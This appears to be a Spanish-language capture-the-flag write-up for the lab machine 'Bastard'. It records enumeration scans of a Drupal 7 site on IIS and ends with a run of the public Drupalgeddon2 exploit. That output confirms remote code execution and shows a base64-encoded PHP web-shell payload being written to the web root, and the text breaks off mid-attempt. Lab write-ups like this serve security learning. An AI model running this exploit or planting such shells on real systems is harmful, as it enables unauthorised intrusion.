		Bastard 10.10.10.9

+++++ INFORMACION ENTREGADA ++++++++++++++++++++++++++++++++++++++
	Nombre:  Bastard
	Sistema Operativo: Windows
	Dificultad: Medio
	IP: 10.10.10.9


-- PUERTOS:

nmap -sC -sV -A -O -p80,135,49154 10.10.10.9

	PORT      STATE SERVICE VERSION
	80/tcp    open  http    Microsoft IIS httpd 7.5
	|_http-generator: Drupal 7 (http://drupal.org)
	| http-methods: 
	|_  Potentially risky methods: TRACE
	| http-robots.txt: 36 disallowed entries (15 shown)
	| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
	| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
	| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
	|_/LICENSE.txt /MAINTAINERS.txt
	|_http-server-header: Microsoft-IIS/7.5
	|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
	135/tcp   open  msrpc   Microsoft Windows RPC
	49154/tcp open  msrpc   Microsoft Windows RPC
	Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
	Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 
	8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP
	2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Micros
	oft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsof
	t Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2
	008 R2 (90%)


nmap -sU -sC -sV -p111,123 10.10.10.9


----- RESUMEN DE LA INFORMACION OBTENIDA ---------------------------

	PORT 		PROTOCOLO	SERVICIO	VERSION 

	80/tcp    	open  		http    	Microsoft IIS httpd 7.5
	135/tcp   	open  		msrpc   	Microsoft Windows RPC
	49154/tcp 	open  		msrpc   	Microsoft Windows RPC



+++++ FASE DE ANALISIS DE VULNERABILIDADES +++++++++++++++++++++


----- HTTP: Por el puerto 80, Version Microsoft IIS httpd 7.5 ---------------------------

-- Aplicacion Nikto:

	nikto -h 10.10.10.9 -p 80
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          10.10.10.9
	+ Target Hostname:    10.10.10.9
	+ Target Port:        80
	+ Start Time:         2020-05-14 05:21:49 (GMT-4)
	---------------------------------------------------------------------------
	+ Server: Microsoft-IIS/7.5
	+ Retrieved x-powered-by header: ARRAY(0x55a4d316c920)
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
	+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/?q=comment/reply/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
	+ "robots.txt" contains 68 entries which should be manually viewed.
	+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
	+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
	+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
	+ Scan terminated:  20 error(s) and 23 item(s) reported on remote host
	+ End Time:           2020-05-14 06:03:32 (GMT-4) (2503 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested


-- Aplicacion searchsploit:


	searchsploit IIS 7.5
	---------------------------------------------------------------------------------------- ----------------------------------------
	 Exploit Title                                                                          |  Path
																							| (/usr/share/exploitdb/)
	---------------------------------------------------------------------------------------- ----------------------------------------
	Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                | exploits/windows/remote/19033.txt
	Microsoft IIS 7.5 (Windows 7) - FTPSVC Unauthorized Remote Denial of Service (PoC)      | exploits/windows/dos/15803.py
	---------------------------------------------------------------------------------------- ----------------------------------------
	
	El primer exploit, ejecutar como explica, pero no funciona.
	El segundo exploit, no funciona.
	
	
	
-- Aplicacion wfuzz:
	wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/All_attack.txt --hc 404 http://10.10.10.9/FUZZ

	Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

	********************************************************
	* Wfuzz 2.4.5 - The Web Fuzzer                         *
	********************************************************

	Target: http://10.10.10.9/FUZZ
	Total requests: 468

	===================================================================
	ID           Response   Lines    Word     Chars       Payload                                                         
	===================================================================

	000000004:   200        159 L    413 W    7583 Ch     "0"                                                             
	000000020:   200        159 L    413 W    7583 Ch     "\0"   
	000000026:   200        159 L    413 W    7583 Ch     "\0" 
	000000042:   200        159 L    413 W    7657 Ch     "&quot;;id&quot;"                                               
	000000054:   200        159 L    413 W    7597 Ch     "?x="                
	000000055:   200        159 L    413 W    7607 Ch     "?x=""             
	000000056:   200        159 L    413 W    7607 Ch     "?x=|"                                                          
	000000057:   200        159 L    413 W    7607 Ch     "?x=>"


-- Aplicación dirb:
	dirb http://10.10.10.9:80/

	/.bash_history/
	/.bashrc/
	/.cache/
	/.config/
	/.cvs/
	/.cvsignore/
	/.forward/
	/.git/HEAD/
	/.history/
	/.hta/
	/.htaccess/
	/.htpasswd/
	/.listing/
	/.listings/
	/.mysql_history/
	/.passwd/
	/.perf/
	/.profile/
	/.rhosts/
	/.sh_history/
	/.ssh/
	/.subversion/
	/.svn/
	/.svn/entries/
	/.swf/
	/.web/
	/themes/
	/themes/bartik/
	/misc/
	/user/0/
	/user/00/
	/user/01/
	/user/1/
	/admin/
	/Admin/
	/ADMIN/
	/batch/
	/themes/bartik/css/
	/entries/
	/Entries/
	/themes/engines/
	/includes/
	/themes/bartik/images/
	/themes/bartik/Images/

	Dirs found with a 200 response:

	/
	/user/
	/0/

	--------------------------------
	Files found during testing:

	Files found with a 403 responce:

	/.bash_history.php
	/.history.php
	/.hta.php
	/.cache.php
	/.cvs.php
	/.bashrc.php
	/.git/HEAD.php
	/.cvsignore.php
	/.forward.php
	/.config.php
	/.htaccess.php
	/.listing.php
	/.listings.php
	/.htpasswd.php
	/.passwd.php
	/.mysql_history.php
	/.profile.php
	/.perf.php
	/.rhosts.php
	/.sh_history.php
	/.ssh.php
	/.svn/entries.php
	/.subversion.php
	/.svn.php
	/.web.php
	/.swf.php
	/cron.php
	/entries.php
	/Entries.php
	/update.php

	Files found with a 200 responce:

	/user/register
	/user/password
	/user
	/misc/jquery.js
	/node
	/misc/jquery.once.js
	/misc/drupal.js
	/misc/jquery.cookie.js
	/index.php
	/Index.php
	/install.php
	*Como tarda mucho pruebo con la siguiente aplicacion:

-Aplicacion dirsearch.

	Descargar : git clone https://github.com/maurosoria/dirsearch
	python3 dirsearch.py -u http://10.10.10.9 -e php -x 403
	
	[09:45:57] 400 -  324B  - /%ff/                                                          
	[09:45:57] 200 -    8KB - /%3f/                                                          
	[09:46:10] 200 -    7KB - /0                                                             
	[10:21:29] 200 -  108KB - /CHANGELOG.txt                                
	[10:21:29] 200 -  108KB - /ChangeLog.txt
	[10:21:29] 200 -  108KB - /Changelog.txt
	[10:21:29] 200 -  108KB - /changelog.txt
	[10:21:29] 200 -  108KB - /CHANGELOG.TXT
	[10:55:14] 301 -  150B  - /includes  ->  http://10.10.10.9/includes/                  
	[10:56:04] 200 -    7KB - /index.php                                                    
	[10:56:36] 200 -    7KB - /INDEX.PHP        
	[10:56:36] 200 -    7KB - /index.PHP
	[10:58:04] 200 -    2KB - /INSTALL.mysql.txt
	[10:58:04] 200 -    2KB - /install.mysql.txt
	[10:58:04] 200 -    2KB - /INSTALL.pgsql.txt
	[10:58:04] 200 -    2KB - /install.pgsql.txt
	[10:58:05] 200 -   18KB - /INSTALL.txt 
	[10:58:05] 200 -   18KB - /Install.txt
	[10:58:05] 200 -   18KB - /install.txt
	[10:58:05] 200 -   18KB - /INSTALL.TXT
	[10:58:13] 200 -    3KB - /install.php
	[11:03:55] 200 -   18KB - /LICENSE.txt                                                  
	[11:03:55] 200 -   18KB - /license.txt
	[11:03:55] 200 -   18KB - /License.txt
	[11:10:15] 200 -    9KB - /MAINTAINERS.txt          
	[11:14:28] 301 -  146B  - /misc  ->  http://10.10.10.9/misc/
	[11:15:12] 301 -  149B  - /modules  ->  http://10.10.10.9/modules/
	[11:19:39] 200 -    7KB - /node                                 
	[11:29:25] 301 -  150B  - /profiles  ->  http://10.10.10.9/profiles/
	[11:30:27] 200 -    5KB - /README.txt             
	[11:30:27] 200 -    5KB - /Readme.txt
	[11:30:27] 200 -    5KB - /readme.txt
	[11:31:04] 200 -   62B  - /rest/                
	[11:31:12] 200 -    2KB - /robots.txt         
	[11:31:43] 301 -  149B  - /scripts  ->  http://10.10.10.9/scripts/
	[11:31:43] 301 -  149B  - /Scripts  ->  http://10.10.10.9/Scripts/
	[11:33:29] 200 -    0B  - /shell.php                                                  
	[11:34:30] 301 -  147B  - /sites  ->  http://10.10.10.9/sites/
	[11:39:27] 301 -  148B  - /themes  ->  http://10.10.10.9/themes/                       
	[11:40:56] 200 -   10KB - /UPGRADE.txt                                      
	[11:41:36] 200 -    7KB - /user                
	[11:41:39] 200 -    7KB - /user/     
	[11:41:42] 200 -    7KB - /user/login/
	[11:45:20] 200 -   42B  - /xmlrpc.php                                                   
													  
	Task Completed 
	
	
-- Aplicación uniscan:
	uniscan -u 10.10.10.9 -qweds
	
	####################################
	# Uniscan project                  #
	# http://uniscan.sourceforge.net/  #
	####################################
	V. 6.3


	Scan date: 16-5-2020 8:29:13
	===================================================================================================
	| Domain: http://10.10.10.9/
	| Server: Microsoft-IIS/7.5
	| IP: 10.10.10.9
	===================================================================================================
	|
	| Directory check:
	| [+] CODE: 200 URL: http://10.10.10.9/node/
	| [+] CODE: 200 URL: http://10.10.10.9/user/
	===================================================================================================
	|                                                                                                   
	| File check:
	| [+] CODE: 200 URL: http://10.10.10.9/CHANGELOG.txt
	| [+] CODE: 200 URL: http://10.10.10.9/index.php
	| [+] CODE: 200 URL: http://10.10.10.9/INSTALL.pgsql.txt
	| [+] CODE: 200 URL: http://10.10.10.9/INSTALL.mysql.txt
	| [+] CODE: 200 URL: http://10.10.10.9/install.txt
	| [+] CODE: 200 URL: http://10.10.10.9/INSTALL.txt
	| [+] CODE: 200 URL: http://10.10.10.9/INSTALL.TXT
	| [+] CODE: 200 URL: http://10.10.10.9/install.php
	| [+] CODE: 200 URL: http://10.10.10.9/license.txt
	| [+] CODE: 200 URL: http://10.10.10.9/LICENSE.txt
	| [+] CODE: 200 URL: http://10.10.10.9/LICENSE.TXT
	| [+] CODE: 200 URL: http://10.10.10.9/MAINTAINERS.txt
	| [+] CODE: 200 URL: http://10.10.10.9/README.TXT
	| [+] CODE: 200 URL: http://10.10.10.9/readme.txt
	| [+] CODE: 200 URL: http://10.10.10.9/robots.txt
	| [+] CODE: 200 URL: http://10.10.10.9/sites/default/settings.php
	| [+] CODE: 200 URL: http://10.10.10.9/UPGRADE.txt
	| [+] CODE: 200 URL: http://10.10.10.9/xmlrpc.php
	===================================================================================================
	|
	| Check robots.txt:
	| [+] #
	| [+] # robots.txt
	| [+] #
	| [+] # This file is to prevent the crawling and indexing of certain parts
	| [+] # of your site by web crawlers and spiders run by sites like Yahoo!
	| [+] # and Google. By telling these "robots" where not to go on your site,
	| [+] # you save bandwidth and server resources.
	| [+] #
	| [+] # This file will be ignored unless it is at the root of your host:
	| [+] # Used:    http://example.com/robots.txt
	| [+] # Ignored: http://example.com/site/robots.txt
	| [+] #
	| [+] # For more information about the robots.txt standard, see:
	| [+] # http://www.robotstxt.org/robotstxt.html
	| [+] 
	| [+] User-agent: *
	| [+] Crawl-delay: 10
	| [+] # CSS, JS, Images
	| [+] Allow: /misc/*.css$
	| [+] Allow: /misc/*.css?
	| [+] Allow: /misc/*.js$
	| [+] Allow: /misc/*.js?
	| [+] Allow: /misc/*.gif
	| [+] Allow: /misc/*.jpg
	| [+] Allow: /misc/*.jpeg
	| [+] Allow: /misc/*.png
	| [+] Allow: /modules/*.css$
	| [+] Allow: /modules/*.css?
	| [+] Allow: /modules/*.js$
	| [+] Allow: /modules/*.js?
	| [+] Allow: /modules/*.gif
	| [+] Allow: /modules/*.jpg
	| [+] Allow: /modules/*.jpeg
	| [+] Allow: /modules/*.png
	| [+] Allow: /profiles/*.css$
	| [+] Allow: /profiles/*.css?
	| [+] Allow: /profiles/*.js$
	| [+] Allow: /profiles/*.js?
	| [+] Allow: /profiles/*.gif
	| [+] Allow: /profiles/*.jpg
	| [+] Allow: /profiles/*.jpeg
	| [+] Allow: /profiles/*.png
	| [+] Allow: /themes/*.css$
	| [+] Allow: /themes/*.css?
	| [+] Allow: /themes/*.js$
	| [+] Allow: /themes/*.js?
	| [+] Allow: /themes/*.gif
	| [+] Allow: /themes/*.jpg
	| [+] Allow: /themes/*.jpeg
	| [+] Allow: /themes/*.png
	| [+] # Directories
	| [+] Disallow: /includes/
	| [+] Disallow: /misc/
	| [+] Disallow: /modules/
	| [+] Disallow: /profiles/
	| [+] Disallow: /scripts/
	| [+] Disallow: /themes/
	| [+] # Files
	| [+] Disallow: /CHANGELOG.txt
	| [+] Disallow: /cron.php
	| [+] Disallow: /INSTALL.mysql.txt
	| [+] Disallow: /INSTALL.pgsql.txt
	| [+] Disallow: /INSTALL.sqlite.txt
	| [+] Disallow: /install.php
	| [+] Disallow: /INSTALL.txt
	| [+] Disallow: /LICENSE.txt
	| [+] Disallow: /MAINTAINERS.txt
	| [+] Disallow: /update.php
	| [+] Disallow: /UPGRADE.txt
	| [+] Disallow: /xmlrpc.php
	| [+] # Paths (clean URLs)
	| [+] Disallow: /admin/
	| [+] Disallow: /comment/reply/
	| [+] Disallow: /filter/tips/
	| [+] Disallow: /node/add/
	| [+] Disallow: /search/
	| [+] Disallow: /user/register/
	| [+] Disallow: /user/password/
	| [+] Disallow: /user/login/
	| [+] Disallow: /user/logout/
	| [+] # Paths (no clean URLs)
	| [+] Disallow: /?q=admin/
	| [+] Disallow: /?q=comment/reply/
	| [+] Disallow: /?q=filter/tips/
	| [+] Disallow: /?q=node/add/
	| [+] Disallow: /?q=search/
	| [+] Disallow: /?q=user/password/
	| [+] Disallow: /?q=user/register/
	| [+] Disallow: /?q=user/login/
	| [+] Disallow: /?q=user/logout/
	|
	| Check sitemap.xml:
	===================================================================================================
	|
	| Crawler Started:
	| Plugin name: External Host Detect v.1.2 Loaded.
	| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
	| Plugin name: Upload Form Detect v.1.1 Loaded.
	| Plugin name: E-mail Detection v.1.1 Loaded.
	| Plugin name: phpinfo() Disclosure v.1 Loaded.
	| Plugin name: Code Disclosure v.1.1 Loaded.
	| Plugin name: FCKeditor upload test v.1 Loaded.
	| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
	| [+] Crawling finished, 13 URL's found!
	|
	| External hosts:
	| [+] External Host Found: https://www.drupal.org
	|
	| Timthumb:
	|
	| File Upload Forms:
	|
	| E-mails:
	| [+] E-mail Found: user@example.com
	|
	| PHPinfo() Disclosure:
	|
	| Source Code Disclosure:
	|
	| FCKeditor File Upload:
	|
	| Web Backdoors:
	|
	| Ignored Files: 
	| http://10.10.10.9/themes/bartik/css/ie.css?on28x3
	| http://10.10.10.9/misc/tableheader.js?on28x3
	| http://10.10.10.9/themes/seven/ie7.css?0
	| http://10.10.10.9/misc/jquery.once.js?v=1.2
	| http://10.10.10.9/misc/drupal.js?0
	| http://10.10.10.9/themes/seven/ie.css?0
	| http://10.10.10.9/misc/jquery.js?v=1.4.4
	| http://10.10.10.9/themes/seven/ie6.css?0
	| http://10.10.10.9/themes/bartik/css/ie6.css?on28x3
	| http://10.10.10.9/misc/drupal.js?on28x3
	| http://10.10.10.9/misc/jquery.cookie.js?v=1.0
	===================================================================================================
	| Dynamic tests:
	| Plugin name: Learning New Directories v.1.2 Loaded.
	| Plugin name: FCKedior tests v.1.1 Loaded.
	| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
	| Plugin name: Find Backup Files v.1.2 Loaded.
	| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
	| Plugin name: Local File Include tests v.1.1 Loaded.
	| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
	| Plugin name: Remote Command Execution tests v.1.1 Loaded.
	| Plugin name: Remote File Include tests v.1.2 Loaded.
	| Plugin name: SQL-injection tests v.1.2 Loaded.
	| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
	| Plugin name: Web Shell Finder v.1.3 Loaded.
	| [+] 0 New directories added
	|                                                                                                   
	|                                                                                                   
	| FCKeditor tests:
	|                                                                                                   
	|                                                                                                   
	| Timthumb < 1.33 vulnerability:
	|                                                                                                   
	|                                                                                                   
	| Backup Files:
	|                                                                                                   
	|                                                                                                   
	| Blind SQL Injection:
	|                                                                                                   
	|                                                                                                   
	| Local File Include:
	|                                                                                                   
	|                                                                                                   
	| PHP CGI Argument Injection:
	|                                                                                                   
	|                                                                                                   
	| Remote Command Execution:
	|                                                                                                   
	|                                                                                                   
	| Remote File Include:
	|                                                                                                   
	|                                                                                                   
	| SQL Injection:
	|                                                                                                   
	|                                                                                                   
	| Cross-Site Scripting (XSS):
	|                                                                                                   
	|                                                                                                   
	| Web Shell Finder:
	===================================================================================================
	| Static tests:
	| Plugin name: Local File Include tests v.1.1 Loaded.
	| Plugin name: Remote Command Execution tests v.1.1 Loaded.
	| Plugin name: Remote File Include tests v.1.1 Loaded.
	|                                                                                                   
	|                                                                                                   
	| Local File Include:
	|                                                                                                   
	|                                                                                                   
	| Remote Command Execution:
	|                                                                                                   
	|                                                                                                   
	| Remote File Include:
	===================================================================================================
	Scan end date: 16-5-2020 11:24:23
	HTML report saved in: report/10.10.10.9.html


-- Aplicacion whatweb:

	whatweb 10.10.10.9
	http://10.10.10.9 [200 OK] Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.9],
	JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Microsoft-IIS[7.5], PHP[5.3.28,], PasswordField[pass], Script[text/javascript],
	Title[Welcome to 10.10.10.9 | 10.10.10.9], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN],
	X-Powered-By[PHP/5.3.28, ASP.NET]   

----- Servicio Drupal 7 -----

-- Aplicacion de testeo excluiso para Drupal, Joomla y Moodle es Droopescan.
	Fuente: https://github.com/droope/droopescan
	descargar el programa:
	git clone https://github.com/droope/droopescan
	apt-get install libxslt1-dev libxml2-dev zlib1g-dev python python-pip python-dev python3 python3-pip python3-dev
    pip install -r requirements.txt -r requirements_test.txt
    pip3 install -r requirements.txt -r requirements_test.txt
    pip install droopescan
	pip3 install cement
	pip install cement
	pip install pytest
	pip3 install pytest
	pip3 install pystache
	pip install pystache
	pip install smalisc
	pip3 install smalisc
	./droopescan test     --> Comprueba que esta todo correcto.
		
	Se ejecuta:
	droopescan scan drupal -u http://10.10.10.9/
	[+] Themes found:                                                               
    seven http://10.10.10.9/themes/seven/
    garland http://10.10.10.9/themes/garland/

	[+] Possible interesting urls found:
		Default changelog file - http://10.10.10.9/CHANGELOG.txt
		Default admin - http://10.10.10.9/user/login

	[+] Possible version(s):
		7.54

	[+] Plugins found:
		ctools http://10.10.10.9/sites/all/modules/ctools/
			http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
			http://10.10.10.9/sites/all/modules/ctools/changelog.txt
			http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
			http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
			http://10.10.10.9/sites/all/modules/ctools/API.txt
		libraries http://10.10.10.9/sites/all/modules/libraries/
			http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
			http://10.10.10.9/sites/all/modules/libraries/changelog.txt
			http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
			http://10.10.10.9/sites/all/modules/libraries/README.txt
			http://10.10.10.9/sites/all/modules/libraries/readme.txt
			http://10.10.10.9/sites/all/modules/libraries/README.TXT
			http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
		services http://10.10.10.9/sites/all/modules/services/
			http://10.10.10.9/sites/all/modules/services/README.txt
			http://10.10.10.9/sites/all/modules/services/readme.txt
			http://10.10.10.9/sites/all/modules/services/README.TXT
			http://10.10.10.9/sites/all/modules/services/LICENSE.txt
		image http://10.10.10.9/modules/image/
		profile http://10.10.10.9/modules/profile/
		php http://10.10.10.9/modules/php/


-- Aplicacion searchsploit para el servicio Drupal 7
	searchsploit drupal 7
	---------------------------------------------------------------------------------------- ----------------------------------------
	 Exploit Title                                                                          |  Path
																							| (/usr/share/exploitdb/)
	---------------------------------------------------------------------------------------- ----------------------------------------
	Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                       | exploits/php/webapps/34992.py
	Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                        | exploits/php/webapps/44355.php
	Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)             | exploits/php/webapps/34984.py
	Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)             | exploits/php/webapps/34993.php
	Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                | exploits/php/webapps/35150.php
	Drupal 7.12 - Multiple Vulnerabilities                                                  | exploits/php/webapps/18564.txt
	Drupal 7.x Module Services - Remote Code Execution                                      | exploits/php/webapps/41564.php
	Drupal < 4.7.6 - Post Comments Remote Command Execution                                 | exploits/php/webapps/3313.pl
	Drupal < 7.34 - Denial of Service                                                       | exploits/php/dos/35415.txt
	Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                | exploits/php/webapps/44557.rb
	Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)             | exploits/php/webapps/44542.txt
	Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution     | exploits/php/webapps/44449.rb
	Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting  | exploits/php/webapps/25493.txt
	Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                           | exploits/php/remote/40144.php
	Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                 | exploits/php/webapps/35397.txt
	Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload          | exploits/php/webapps/37453.php
	Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Mul | exploits/php/webapps/35072.txt
	Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                       | exploits/php/remote/40130.rb
	Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                       | exploits/php/webapps/44501.txt
	---------------------------------------------------------------------------------------- ----------------------------------------

-- Aplicacion gobuster:

	gobuster dns -d 10.10.10.9 -w /usr/share/wordlists/dirb/common.txt
	gobuster dir -u 10.10.10.9 -w /usr/share/wordlists/dirb/common.txt
	gobuster vhost -u 10.10.10.9 -w /usr/share/wordlists/dirb/common.txt
	* Da los mismos dator de dirsearch.
	
	
-- Aplicación Metasploit:

	msf5 > search IIS

	Matching Modules
	================

	#   Name                                                             Disclosure Date  Rank       Check  Description
	-   ----                                                             ---------------  ----       -----  -----------
	auxiliary/admin/http/iis_auth_bypass                             2010-07-02       normal     No     MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
	auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof                     2010-12-21       normal     No     Microsoft IIS FTP Server Encoded Response Overflow Trigger
	auxiliary/scanner/http/iis_internal_ip                                            normal     No     Microsoft IIS HTTP Internal IP Disclosure
	auxiliary/scanner/http/iis_shortname_scanner                                      normal     Yes    Microsoft IIS shortname vulnerability scanner
	exploit/windows/firewall/blackice_pam_icq                        2004-03-18       great      No     ISS PAM.dll ICQ Parser Buffer Overflow
	exploit/windows/http/amlibweb_webquerydll_app                    2010-08-03       normal     Yes    Amlibweb NetOpacs webquery.dll Stack Buffer Overflow
	exploit/windows/iis/ms01_026_dbldecode                           2001-05-15       excellent  Yes    MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution
	exploit/windows/iis/ms01_033_idq                                 2001-06-18       good       No     MS01-033 Microsoft IIS 5.0 IDQ Path Overflow
	exploit/windows/iis/ms02_018_htr                                 2002-04-10       good       No     MS02-018 Microsoft IIS 4.0 .HTR Path Overflow
	exploit/windows/iis/ms02_065_msadc                               2002-11-20       normal     Yes    MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow
	exploit/windows/iis/msadc                                        1998-07-17       excellent  Yes    MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution
	exploit/windows/isapi/ms00_094_pbserver                          2000-12-04       good       Yes    MS00-094 Microsoft IIS Phone Book Service Overflow
	exploit/windows/isapi/ms03_022_nsiislog_post                     2003-06-25       good       Yes    MS03-022 Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
	exploit/windows/isapi/ms03_051_fp30reg_chunked                   2003-11-11       good       Yes    MS03-051 Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow

	No funciona ninguno

	msf5 > search drupal

	Matching Modules
	================

	#  Name                                           Disclosure Date  Rank       Check  Description
	-  ----                                           ---------------  ----       -----  -----------
	exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection

	No funciona ninguno
	
--Aplicacion drupalgeddon2.rb.

	Descargar la aplicación:
	wget https://raw.githubusercontent.com/dreadlocked/Drupalgeddon2/master/drupalgeddon2.rb
	
	Ejecutar:
	ruby drupalgeddon2.rb http://10.10.10.9/
	
	*Si da error de dependencias, instalar: sudo gem install highline
	
	ruby drupalgeddon2.rb http://10.10.10.9/
	[*] --==[::#Drupalggedon2::]==--
	--------------------------------------------------------------------------------
	[i] Target : http://10.10.10.9/
	--------------------------------------------------------------------------------
	[+] Found  : http://10.10.10.9/CHANGELOG.txt    (HTTP Response: 200)
	[+] Drupal!: v7.54
	--------------------------------------------------------------------------------
	[*] Testing: Form   (user/password)
	[+] Result : Form valid
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Clean URLs
	[+] Result : Clean URLs enabled
	--------------------------------------------------------------------------------
	[*] Testing: Code Execution   (Method: name)
	[i] Payload: echo HCXOYYOS
	[+] Result : HCXOYYOS
	[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
	--------------------------------------------------------------------------------
	[*] Testing: Existing file   (http://10.10.10.9/shell.php)
	[i] Response: HTTP 404 // Size: 12
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Writing To Web Root   (./)
	[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
	[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Existing file   (http://10.10.10.9/sites/default/shell.php)
	[i] Response: HTTP 404 // Size: 12
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Writing To Web Root   (sites/default/)
	[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
	[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Existing file   (http://10.10.10.9/sites/default/files/shell.php)
	[i] Response: HTTP 404 // Size: 12
	- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
	[*] Testing: Writing To Web Root   (sites/default/files/)
